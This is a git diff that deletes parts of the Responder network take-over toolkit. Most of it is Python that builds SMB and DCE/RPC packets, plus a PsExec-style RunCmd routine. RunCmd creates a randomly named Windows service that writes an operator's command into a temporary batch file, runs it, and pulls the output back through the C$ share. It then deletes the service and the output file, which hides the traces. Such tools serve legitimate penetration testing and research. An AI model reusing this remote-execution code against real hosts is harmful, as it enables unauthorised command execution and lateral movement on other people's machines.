-        ("FileNameLen",   "\x07\x00"),
-        ("CreateFlags",   "\x16\x00\x00\x00"),
-        ("RootFID",       "\x00\x00\x00\x00"),
-        ("AccessMask",    "\x00\x00\x00\x02"),
-        ("AllocSize",     "\x00\x00\x00\x00\x00\x00\x00\x00"),
-        ("FileAttrib",    "\x00\x00\x00\x00"),
-        ("ShareAccess",   "\x07\x00\x00\x00"),
-        ("Disposition",   "\x01\x00\x00\x00"),   
-        ("CreateOptions", "\x00\x00\x00\x00"),
-        ("Impersonation", "\x02\x00\x00\x00"),
-        ("SecurityFlags", "\x00"),
-        ("Bcc",           "\x08\x00"),
-        ("FileName",      "\\svcctl"),
-        ("FileNameNull",  "\x00"),
-    ])
-
-    def calculate(self):
-
-        Data1= str(self.fields["FileName"])+str(self.fields["FileNameNull"])
-        self.fields["FileNameLen"] = struct.pack("<h",len(str(self.fields["FileName"])))
-        self.fields["Bcc"] = struct.pack("<h",len(Data1))
-class SMBReadData(Packet):
-    fields = OrderedDict([
-        ("Wordcount",     "\x0a"),
-        ("AndXCommand",   "\xff"),
-        ("Reserved",      "\x00" ),
-        ("Andxoffset",    "\x00\x00"),
-        ("FID",           "\x00\x00"),
-        ("Offset",        "\x19\x03\x00\x00"), 
-        ("MaxCountLow",   "\xed\x01"),
-        ("MinCount",      "\xed\x01"),
-        ("Hidden",        "\xff\xff\xff\xff"),
-        ("Remaining",     "\x00\x00"),  
-        ("Bcc",           "\x00\x00"),
-        ("Data", ""),
-    ])
-
-    def calculate(self):
-
-        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
-
-class SMBWriteData(Packet):
-    fields = OrderedDict([
-        ("Wordcount",     "\x0e"),
-        ("AndXCommand",   "\xff"),
-        ("Reserved",      "\x00" ),
-        ("Andxoffset",    "\x00\x00"),
-        ("FID",           "\x06\x40"),
-        ("Offset",        "\xea\x03\x00\x00"),
-        ("Reserved2",     "\xff\xff\xff\xff"),
-        ("WriteMode",     "\x08\x00"),
-        ("Remaining",     "\xdc\x02"),
-        ("DataLenHi",     "\x00\x00"),
-        ("DataLenLow",    "\xdc\x02"),
-        ("DataOffset",    "\x3f\x00"),
-        ("HiOffset",      "\x00\x00\x00\x00"),   
-        ("Bcc",           "\xdc\x02"),
-        ("Data", ""),
-    ])
-
-    def calculate(self):
-        self.fields["Remaining"] = struct.pack("<h",len(str(self.fields["Data"])))
-        self.fields["DataLenLow"] = struct.pack("<h",len(str(self.fields["Data"])))
-        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
-
-class SMBTransDCERPC(Packet):
-    fields = OrderedDict([
-        ("Wordcount",             "\x10"),
-        ("TotalParamCount",       "\x00\x00"),
-        ("TotalDataCount",        "\x00\x00" ),
-        ("MaxParamCount",         "\x00\x00"),
-        ("MaxDataCount",          "\x00\x04"),
-        ("MaxSetupCount",         "\x00"),
-        ("Reserved",              "\x00\x00"),
-        ("Flags",                 "\x00"),
-        ("Timeout",               "\x00\x00\x00\x00"),
-        ("Reserved1",             "\x00\x00"),
-        ("ParamCount",            "\x00\x00"),
-        ("ParamOffset",           "\x00\x00"),
-        ("DataCount",             "\x00\x00"),
-        ("DataOffset",            "\x00\x00"),
-        ("SetupCount",            "\x02"),
-        ("Reserved2",             "\x00"),
-        ("OpNum",                 "\x26\x00"),
-        ("FID",                   "\x00\x00"),
-        ("Bcc",                   "\x00\x00"),
-        ("Terminator",            "\x00"),
-        ("PipeName",              "\\PIPE\\"),
-        ("PipeTerminator",        "\x00\x00"),
-        ("Data", ""),
-
-    ])
-    def calculate(self):
-        #Padding
-        if len(str(self.fields["Data"]))%2==0:
-           self.fields["PipeTerminator"] = "\x00\x00\x00\x00"
-        else:
-           self.fields["PipeTerminator"] = "\x00\x00\x00"
-        ##Convert Path to Unicode first before any Len calc.
-        self.fields["PipeName"] = self.fields["PipeName"].encode('utf-16le')
-
-        ##Data Len
-        self.fields["TotalDataCount"] = struct.pack("<h", len(str(self.fields["Data"])))
-        self.fields["DataCount"] = struct.pack("<h", len(str(self.fields["Data"])))
-
-        ##Packet len
-        FindRAPOffset = str(self.fields["Wordcount"])+str(self.fields["TotalParamCount"])+str(self.fields["TotalDataCount"])+str(self.fields["MaxParamCount"])+str(self.fields["MaxDataCount"])+str(self.fields["MaxSetupCount"])+str(self.fields["Reserved"])+str(self.fields["Flags"])+str(self.fields["Timeout"])+str(self.fields["Reserved1"])+str(self.fields["ParamCount"])+str(self.fields["ParamOffset"])+str(self.fields["DataCount"])+str(self.fields["DataOffset"])+str(self.fields["SetupCount"])+str(self.fields["Reserved2"])+str(self.fields["OpNum"])+str(self.fields["FID"])+str(self.fields["Bcc"])+str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])
-
-        self.fields["ParamOffset"] = struct.pack("<h", len(FindRAPOffset)+32)
-        self.fields["DataOffset"] = struct.pack("<h", len(FindRAPOffset)+32)
-        ##Bcc Buff Len
-        BccComplete    = str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])+str(self.fields["Data"])
-        self.fields["Bcc"] = struct.pack("<h", len(BccComplete))
-
-
-class SMBDCEData(Packet):
-    fields = OrderedDict([
-        ("Version",       "\x05"),
-        ("VersionLow",    "\x00"),
-        ("PacketType",    "\x0b"),
-        ("PacketFlag",    "\x03"),
-        ("DataRepresent", "\x10\x00\x00\x00"),
-        ("FragLen",       "\x2c\x02"),
-        ("AuthLen",       "\x00\x00"),
-        ("CallID",        "\x00\x00\x00\x00"),
-        ("MaxTransFrag",  "\xd0\x16"),
-        ("MaxRecvFrag",   "\xd0\x16"),
-        ("GroupAssoc",    "\x00\x00\x00\x00"),
-        ("CTXNumber",     "\x01"),
-        ("CTXPadding",    "\x00\x00\x00"),
-        ("CTX0ContextID",  "\x00\x00"),
-        ("CTX0ItemNumber", "\x01\x00"),
-        ("CTX0UID", "\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03"),
-        ("CTX0UIDVersion", "\x02\x00"),
-        ("CTX0UIDVersionlo","\x00\x00"),
-        ("CTX0UIDSyntax",   "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60"),
-        ("CTX0UIDSyntaxVer","\x02\x00\x00\x00"),
-    ])
-
-    def calculate(self):
-
-        Data1= str(self.fields["Version"])+str(self.fields["VersionLow"])+str(self.fields["PacketType"])+str(self.fields["PacketFlag"])+str(self.fields["DataRepresent"])+str(self.fields["FragLen"])+str(self.fields["AuthLen"])+str(self.fields["CallID"])+str(self.fields["MaxTransFrag"])+str(self.fields["MaxRecvFrag"])+str(self.fields["GroupAssoc"])+str(self.fields["CTXNumber"])+str(self.fields["CTXPadding"])+str(self.fields["CTX0ContextID"])+str(self.fields["CTX0ItemNumber"])+str(self.fields["CTX0UID"])+str(self.fields["CTX0UIDVersion"])+str(self.fields["CTX0UIDVersionlo"])+str(self.fields["CTX0UIDSyntax"])+str(self.fields["CTX0UIDSyntaxVer"])
-
-
-        self.fields["FragLen"] = struct.pack("<h",len(Data1))
-
-class SMBDCEPacketData(Packet):
-    fields = OrderedDict([
-        ("Version",       "\x05"),
-        ("VersionLow",    "\x00"),
-        ("PacketType",    "\x00"),
-        ("PacketFlag",    "\x03"),
-        ("DataRepresent", "\x10\x00\x00\x00"),
-        ("FragLen",       "\x00\x00"),
-        ("AuthLen",       "\x00\x00"),
-        ("CallID",        "\x00\x00\x00\x00"),
-        ("AllocHint",     "\x00\x00\x00\x00"),
-        ("ContextID",     "\x00\x00"),
-        ("Opnum",         "\x0f\x00"),
-        ("Data",          ""),
-
-    ])
-
-    def calculate(self):
-
-        Data1= str(self.fields["Version"])+str(self.fields["VersionLow"])+str(self.fields["PacketType"])+str(self.fields["PacketFlag"])+str(self.fields["DataRepresent"])+str(self.fields["FragLen"])+str(self.fields["AuthLen"])+str(self.fields["CallID"])+str(self.fields["AllocHint"])+str(self.fields["ContextID"])+str(self.fields["Opnum"])+str(self.fields["Data"])
-
-        self.fields["FragLen"] = struct.pack("<h",len(Data1))
-        self.fields["AllocHint"] = struct.pack("<i",len(str(self.fields["Data"])))
-
-class SMBDCESVCCTLOpenManagerW(Packet):
-    fields = OrderedDict([
-        ("MachineNameRefID",     "\xb5\x97\xb9\xbc"),
-        ("MaxCount",             "\x0f\x00\x00\x00"),
-        ("Offset",               "\x00\x00\x00\x00"),
-        ("ActualCount",          "\x0f\x00\x00\x00"),
-        ("MachineName",          ""),
-        ("MachineNameNull",      "\x00\x00"),
-        ("DbPointer",            "\x00\x00\x00\x00"),
-        ("AccessMask",           "\x3f\x00\x0f\x00"),
-    ])
-
-    def calculate(self):
-        ## Convert to UTF-16LE
-        self.fields["MaxCount"] = struct.pack("<i",len(str(self.fields["MachineName"]))+1)
-        self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["MachineName"]))+1)
-        self.fields["MachineName"] = self.fields["MachineName"].encode('utf-16le')
-
-class SMBDCESVCCTLCreateService(Packet):
-    fields = OrderedDict([
-        ("ContextHandle",        ""),
-        ("MaxCount",             "\x0c\x00\x00\x00"),
-        ("Offset",               "\x00\x00\x00\x00"),
-        ("ActualCount",          "\x0c\x00\x00\x00"),
-        ("ServiceName",          "AyAGaxwLhCP"),
-        ("MachineNameNull",      "\x00\x00"),
-        ("ReferentID",           "\x00\x00\x02\x00"),
-        ("MaxCountRefID",        "\x11\x00\x00\x00"),
-        ("OffsetID",             "\x00\x00\x00\x00"),
-        ("ActualCountRefID",     "\x11\x00\x00\x00"),
-        ("DisplayNameID",        "DhhUFcsvrfJvLwRq"),
-        ("DisplayNameIDNull",    "\x00\x00\x00\x00"),
-        ("AccessMask",           "\xff\x01\x0f\x00"),
-        ("ServerType",           "\x10\x01\x00\x00"),
-        ("ServiceStartType",     "\x03\x00\x00\x00"),
-        ("ServiceErrorCtl",      "\x00\x00\x00\x00"),
-        ("BinPathMaxCount",      "\xb6\x00\x00\x00"),
-        ("BinPathOffset",        "\x00\x00\x00\x00"),
-        ("BinPathActualCount",   "\xb6\x00\x00\x00"),
-        ("FileName",             ""),
-        ("BinPathName",          ""),
-        ("BinCMD",               ""),
-        ("BintoEnd",             ""),
-        ("BinCMDTerminator",     "\x00\x00"),
-        ("LoadOrderGroup",       "\x00\x00\x00\x00"),
-        ("TagID",                "\x00\x00\x00\x00"),
-        ("Dependencies",         "\x00\x00\x00\x00"),
-        ("DependenciesLen",      "\x00\x00\x00\x00"),
-        ("ServiceStartName",     "\x00\x00\x00\x00"),
-        ("Password",             "\x00\x00\x00\x00"),
-        ("PasswordLen",          "\x00\x00\x00\x00"), 
-        ("Padding",              "\x00\x00"),
-
-    ])
-
-    def calculate(self):
-        self.fields["BinCMD"] = self.fields["BinCMD"].replace("&", "^&")#Filtering
-        self.fields["BinCMD"] = self.fields["BinCMD"].replace("(", "^(")#Filtering
-        self.fields["BinCMD"] = self.fields["BinCMD"].replace(")", "^)")#Filtering
-        self.fields["BinCMD"] = self.fields["BinCMD"].replace("%", "^%")#Filtering
-        self.fields["BinCMD"] = self.fields["BinCMD"].replace(">", "^>")#Filtering
-        self.fields["BinCMD"] = self.fields["BinCMD"].replace(">", "^>")#Filtering
-        self.fields["BinCMD"] = self.fields["BinCMD"].replace("|", "^|")#Filtering
-        self.fields["BinCMD"] = self.fields["BinCMD"].replace(",", "^,")#Filtering
-        self.fields["BinCMD"] = self.fields["BinCMD"].replace("$", "^$")#Filtering
-        self.fields["BinCMD"] = self.fields["BinCMD"].replace("!", "^!")#Filtering
-        self.fields["BinCMD"] = self.fields["BinCMD"].replace(",", "^,")#Filtering
-        self.fields["BinCMD"] = self.fields["BinCMD"].replace("'", "^'")#Filtering
-        self.fields["BinCMD"] = self.fields["BinCMD"].replace("\"", "^\"")#Filtering
-
-        File = "%WINDIR%\\Temp\\"+self.fields["FileName"]
-        WinTmpPath = "%WINDIR%\\Temp\\Results.txt"
-        FinalCMD = "del /F /Q "+File+"^&"+self.fields["BinCMD"]+" ^>"+WinTmpPath+" >"+File
-        #That is: echo cmd into random .bat file, run .bat file, delete the bat file (it's loaded in memory).
-        self.fields["FileName"] = ""#Reset it.
-        self.fields["BinPathName"] = "%COMSPEC% /C echo "#make sure to escape "&" when using echo.
-        self.fields["BinCMD"] = FinalCMD
-        self.fields["BintoEnd"] = "& %COMSPEC% /C "+File+" &exit"#make sure to exit when done.
-        BinDataLen = str(self.fields["BinPathName"])+str(self.fields["BinCMD"])+str(self.fields["BintoEnd"])
-
-        ## Calculate first
-        self.fields["BinPathMaxCount"] = struct.pack("<i",len(BinDataLen)+1)
-        self.fields["BinPathActualCount"] = struct.pack("<i",len(BinDataLen)+1)
-        self.fields["MaxCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
-        self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
-        self.fields["MaxCountRefID"] = struct.pack("<i",len(str(self.fields["DisplayNameID"]))+1)
-        self.fields["ActualCountRefID"] = struct.pack("<i",len(str(self.fields["DisplayNameID"]))+1)
-        ## Then convert to UTF-16LE, yeah it's weird..
-        self.fields["ServiceName"] = self.fields["ServiceName"].encode('utf-16le')
-        self.fields["DisplayNameID"] = self.fields["DisplayNameID"].encode('utf-16le')
-        self.fields["BinPathName"] = self.fields["BinPathName"].encode('utf-16le')
-        self.fields["BinCMD"] = self.fields["BinCMD"].encode('utf-16le')
-        self.fields["BintoEnd"] = self.fields["BintoEnd"].encode('utf-16le')
-
-class SMBDCESVCCTLOpenService(Packet):
-    fields = OrderedDict([
-        ("ContextHandle",        ""),
-        ("MaxCount",             "\x00\x00\x00\x00"),
-        ("Offset",               "\x00\x00\x00\x00"),
-        ("ActualCount",          "\x00\x00\x00\x00"),
-        ("ServiceName",          ""),
-        ("MachineNameNull",      "\x00\x00"),
-        ("AccessMask",           "\xff\x01\x0f\x00"),
-    ])
-
-    def calculate(self):
-        ## Calculate first
-        self.fields["MaxCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
-        self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
-        ## Then convert to UTF-16LE, yeah it's weird..
-        self.fields["ServiceName"] = self.fields["ServiceName"].encode('utf-16le')
-
-class SMBDCESVCCTLStartService(Packet):
-    fields = OrderedDict([
-        ("ContextHandle",        ""),
-        ("MaxCount",             "\x00\x00\x00\x00\x00\x00\x00\x00"),
-    ])
-
-class SMBDCESVCCTLDeleteService(Packet):
-    fields = OrderedDict([
-        ("ContextHandle",        ""),
-    ])
-
-class SMBDCESVCCTLCloseService(Packet):
-    fields = OrderedDict([
-        ("ContextHandle",        ""),
-    ])
-
-
-class OpenAndX(Packet):
-    fields = OrderedDict([
-        ("Wordcount",             "\x0f"),
-        ("AndXCommand",           "\xff"),
-        ("Reserved",              "\x00" ),
-        ("Andxoffset",            "\x00\x00"),
-        ("Flags",                 "\x07\x00"),
-        ("DesiredAccess",         "\xc2\x00"),
-        ("SearchAttrib",          "\x16\x00"),
-        ("FileAttrib",            "\x20\x00"),
-        ("Created",               "\x40\x9d\xc1\x57"),
-        ("OpenFunc",              "\x12\x00"),
-        ("allocsize",             "\x00\x00\x00\x00"),
-        ("Timeout",               "\x00\x00\x00\x00"),
-        ("Reserved2",             "\x00\x00\x00\x00"),
-        ("Bcc",                   "\x0b\x00"),
-        ("Terminator",            ""),
-        ("File",                  "\\"),
-        ("FileNull",              "\x00"),
-
-    ])
-    def calculate(self):
-        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Terminator"])+str(self.fields["File"])+str(self.fields["FileNull"])))
-
-class ReadRequest(Packet):
-    fields = OrderedDict([
-        ("Wordcount",             "\x05"),
-        ("FID",                   "\x02\x40"),
-        ("Count",                 "\xf0\xff"),
-        ("Offset",                "\x00\x00\x00\x00"),
-        ("RemainingBytes",        "\xf0\xff"),
-        ("Bcc",                   "\x00\x00"),
-
-    ])
-
-class ReadRequestAndX(Packet):
-    fields = OrderedDict([
-        ("Wordcount",             "\x0C"),
-        ("AndXCommand",           "\xff"),
-        ("Reserved",              "\x00"),
-        ("AndXOffset",            "\xde\xde"),
-        ("FID",                   "\x02\x40"),
-        ("Offset",                "\x00\x00\x00\x00"),
-        ("MaxCountLow",           "\xf0\xff"),
-        ("MinCount",              "\xf0\xff"),
-        ("Timeout",               "\xff\xff\xff\xff"),
-        ("RemainingBytes",        "\xf0\xff"),
-        ("HighOffset",            "\x00\x00\x00\x00"),
-        ("Bcc",                   "\x00\x00"),
-
-    ])
-
-
-class CloseRequest(Packet):
-    fields = OrderedDict([
-        ("Wordcount",             "\x03"),
-        ("FID",                   "\x00\x00"),
-        ("LastWrite",             "\xff\xff\xff\xff"),
-        ("Bcc",                   "\x00\x00"),
-
-    ])
-
-class DeleteFileRequest(Packet):
-    fields = OrderedDict([
-        ("Wordcount",             "\x01"),
-        ("SearchAttributes",      "\x06\x00"),
-        ("Bcc",                   "\x1b\x00"),
-        ("BuffType",              "\x04"),
-        ("File",                  ""),
-        ("FileNull",              "\x00\x00"),
-
-    ])
-    def calculate(self):
-        self.fields["File"] = self.fields["File"].encode('utf-16le')
-        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["BuffType"])+str(self.fields["File"])+str(self.fields["FileNull"])))
-
-class SMBEcho(Packet):
-    fields = OrderedDict([
-        ("Wordcount",             "\x01"),
-        ("EchoCount",             "\x01\x00"),
-        ("Bcc",                   "\x1b\x00"),
-        ("File",                  "LWO CW VLO DEO MAW LMW ARW"),#nt4 style.
-        ("FileNull",              "\x00"),
-
-    ])
-
-###########################PSEXEC#############################################
-
-def ExtractCommandOutput(data):
-    DataLen = struct.unpack("<H", data[61:63])[0]
-    Output = data[63:63+DataLen]
-    return Output
-
-def SMBReadRecv(s):
-    Completedata=[]
-    data=''
-    Start=time.time()
-    s.setblocking(0)
-    while 1:
-        if Completedata and time.time()-Start > 0.5:#Timeout
-            break
-        try:
-            data = s.recv(1024)
-            if data:
-                Completedata.append(data)
-                Start=time.time()
-            else:
-                break
-        except:
-            pass
-
-    s.setblocking(1)
-    return s, ''.join(Completedata)
-
-
-def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host):
-    if data == None:
-        return False
-    head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",mid="\x05\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
-    t = SMBNTCreateData()
-    t.calculate()
-    packet0 = str(head)+str(t)
-    buffer1 = longueur(packet0)+packet0
-    s.send(buffer1)
-    data = s.recv(2048)
-
-    ## Fail Handling.
-    if data[8:10] == "\xa2\x22":
-        print "[+] NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation.\n"
-        return False
-
-    ## DCE/RPC Write.
-    if data[8:10] == "\xa2\x00":
-        head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
-        x = SMBDCEData()
-        x.calculate()
-        f = data[42:44]
-        t = SMBWriteData(FID=f,Data=x)
-        t.calculate()
-        packet0 = str(head)+str(t)
-        buffer1 = longueur(packet0)+packet0
-        s.send(buffer1)
-        data = s.recv(2048)
-    ## DCE/RPC Read.
-    if data[8:10] == "\x2f\x00":
-            head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
-            t = SMBReadData(FID=f,MaxCountLow="\x00\x04", MinCount="\x00\x04",Offset="\x00\x00\x00\x00")
-            t.calculate()
-            packet0 = str(head)+str(t)
-            buffer1 = longueur(packet0)+packet0
-            s.send(buffer1)
-            data = s.recv(2048)
-            ## DCE/RPC SVCCTLOpenManagerW.
-            if data[8:10] == "\x2e\x00":
-                head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
-                w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x02\x00", MachineName=Host[0])
-                w.calculate()
-                x = SMBDCEPacketData(Data=w)
-                x.calculate()
-                t = SMBTransDCERPC(FID=f,Data=x)
-                t.calculate()
-                packet0 = str(head)+str(t)
-                buffer1 = longueur(packet0)+packet0
-                s.send(buffer1)
-                data = s.recv(2048)
-
-                ##Error handling.
-                if data[8:10] == "\x2e\x00":
-                    if data[len(data)-4:] == "\x05\x00\x00\x00":
-                        print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n"
-                        return False
-
-                ## DCE/RPC Create Service.
-                if data[8:10] == "\x25\x00":
-                    ContextHandler = data[84:104]
-                    ServiceNameChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(11)])
-                    ServiceIDChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(16)])
-                    FileChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])+'.bat'
-                    FilePath = FileChars
-                    head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
-                    w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler, ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars, FileName=FilePath,BinCMD=Command)
-                    w.calculate()
-                    x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w)
-                    x.calculate()
-                    t = SMBTransDCERPC(FID=f,Data=x)
-                    t.calculate()
-                    packet0 = str(head)+str(t)
-                    buffer1 = longueur(packet0)+packet0
-                    s.send(buffer1)
-                    data = s.recv(2048)
-                    #print "[+] Creating service"
-
-                    ## DCE/RPC SVCCTLOpenService.
-                    if data[8:10] == "\x25\x00":
-                        if data[len(data)-4:] == "\x05\x00\x00\x00":
-                            print "[+] Failed to create the service\n"
-                            return False
-                        #print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars)
-                        head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
-                        w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars)
-                        w.calculate()
-                        x = SMBDCEPacketData(Opnum="\x10\x00",Data=w)
-                        x.calculate()
-                        t = SMBTransDCERPC(FID=f,Data=x)
-                        t.calculate()
-                        packet0 = str(head)+str(t)
-                        buffer1 = longueur(packet0)+packet0
-                        s.send(buffer1)
-                        data = s.recv(2048)
-
-                        ## DCE/RPC SVCCTLStartService.
-                        if data[8:10] == "\x25\x00":
-                            if data[len(data)-4:] == "\x05\x00\x00\x00":
-                                print "[+] Failed to open the service.\n"
-                                return False
-                            ContextHandler = data[84:104]
-                            head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
-                            w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler)
-                            x = SMBDCEPacketData(Opnum="\x13\x00",Data=w)
-                            x.calculate()
-                            t = SMBTransDCERPC(FID=f,Data=x)
-                            t.calculate()
-                            packet0 = str(head)+str(t)
-                            buffer1 = longueur(packet0)+packet0
-                            s.send(buffer1)
-                            data = s.recv(2048)
-
-                            ## DCE/RPC SVCCTLDeleteService.
-                            if data[8:10] == "\x25\x00":
-                                if data[len(data)-4:] == "\x05\x00\x00\x00":
-                                    print "[+] Failed to start the service.\n"
-                                    return False
-                                head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
-                                w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandler)
-                                x = SMBDCEPacketData(Opnum="\x02\x00",Data=w)
-                                x.calculate()
-                                t = SMBTransDCERPC(FID=f,Data=x)
-                                t.calculate()
-                                packet0 = str(head)+str(t)
-                                buffer1 = longueur(packet0)+packet0
-                                s.send(buffer1)
-                                data = s.recv(2048)
-
-                                ## DCE/RPC SVCCTLCloseService
-                                if data[8:10] == "\x25\x00":
-                                    if data[len(data)-4:] == "\x05\x00\x00\x00":
-                                        print "[+] Failed to delete the service.\n"
-                                        return False
-                                    head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
-                                    w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandler)
-                                    x = SMBDCEPacketData(Opnum="\x00\x00",Data=w)
-                                    x.calculate()
-                                    t = SMBTransDCERPC(FID=f,Data=x)
-                                    t.calculate()
-                                    packet0 = str(head)+str(t)
-                                    buffer1 = longueur(packet0)+packet0
-                                    s.send(buffer1)
-                                    data = s.recv(2048)
-
-                                    ##Close FID Request
-                                    if data[8:10] == "\x25\x00":
-                                       head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
-                                       t = CloseRequest(FID = f)
-                                       packet1 = str(head)+str(t)
-                                       buffer1 = longueur(packet1)+packet1  
-                                       s.send(buffer1)
-                                       data = s.recv(2048)
-
-    ##Tree connect c$
-    if data[8:10] == "\x04\x00":
-
-       if data[len(data)-4:] == "\x05\x00\x00\x00":
-           print "[+] Failed to start the service.\n"
-           return False
-
-       #print "[+] Command executed, grabbing output now."
-       Logs.info('Command executed:')
-       Logs.info(clientIP+","+Username+','+Command)
-       #print "[+] Removing service.\n[+] Cleaning up output file.\n"
-       head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
-       t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\C$")
-       t.calculate()
-       packet1 = str(head)+str(t)
-       buffer1 = longueur(packet1)+packet1
-       s.send(buffer1)
-       data = s.recv(2048)
-       ##OpenAndX.
-       if data[8:10] == "\x75\x00":
-          head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
-          t = OpenAndX(File="\\Windows\\Temp\\Results.txt", OpenFunc="\x01\x00")
-          t.calculate()
-          packet1 = str(head)+str(t)
-          buffer1 = longueur(packet1)+packet1  
-          s.send(buffer1)
-          data = s.recv(2048)
-          ##OpenAndX.
-          if data[8:10] == "\x2d\x34":
-             time.sleep(1)#not found, maybe still processing the cmd. Wait a bit.
-             head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
-             t = OpenAndX(File="\\Windows\\Temp\\Results.txt", OpenFunc="\x01\x00")
-             t.calculate()
-             packet1 = str(head)+str(t)
-             buffer1 = longueur(packet1)+packet1  
-             s.send(buffer1)
-             data = s.recv(2048)
-          ##OpenAndX.
-          if data[8:10] == "\x2d\x34":
-             time.sleep(1)#not found, command failed.
-             print "[+] The command failed."
-             return data
-
-    ##ReadRequest.
-    ## Need grab the size from Open And X and do it properly later. For now, only 65535 bytes printed.
-    if data[8:10] == "\x2d\x00":
-       ReturnedFID = data[41:43]
-       head = SMBHeader(cmd="\x2e",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x12\x00")
-       t = ReadRequestAndX(FID=ReturnedFID)
-       packet1 = str(head)+str(t)
-       buffer1 = longueur(packet1)+packet1  
-       s.send(buffer1)
-       s, data = SMBReadRecv(s)
-       #print "[+] Output:\n"
-       print ExtractCommandOutput(data)
-
-       ##Close Request
-       if data[8:10] == "\x2e\x00":
-          head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
-          t = CloseRequest(FID = ReturnedFID)
-          packet1 = str(head)+str(t)
-          buffer1 = longueur(packet1)+packet1  
-          s.send(buffer1)
-          data = s.recv(2048)
-
-    ##DeleteFileRequest.
-    if data[8:10] == "\x04\x00":
-       head = SMBHeader(cmd="\x06",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x13\x00")
-       t = DeleteFileRequest(File="\\Windows\\Temp\\Results.txt")
-       t.calculate()
-       packet1 = str(head)+str(t)
-       buffer1 = longueur(packet1)+packet1  
-       #print "[+] Deleting file now."
-       s.send(buffer1)
-       data = s.recv(2048)
-
-    if data[8:10] == "\x06\x00":
-       #print "[+] File deleted, making sure it's not there anymore.." 
-       head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
-       t = OpenAndX(File="\\Windows\\Temp\\Results.txt", OpenFunc="\x01\x00")
-       t.calculate()
-       packet1 = str(head)+str(t)
-       buffer1 = longueur(packet1)+packet1  
-       s.send(buffer1)
-       data = s.recv(2048)
-       return data
-
-
-
diff --git a/tools/RelayHTTPSMB/HTTPToSMBRelay.py b/tools/RelayHTTPSMB/HTTPToSMBRelay.py
deleted file mode 100755
index 355e292..0000000
--- a/tools/RelayHTTPSMB/HTTPToSMBRelay.py
+++ /dev/null
@@ -1,387 +0,0 @@
-#!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
-# created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
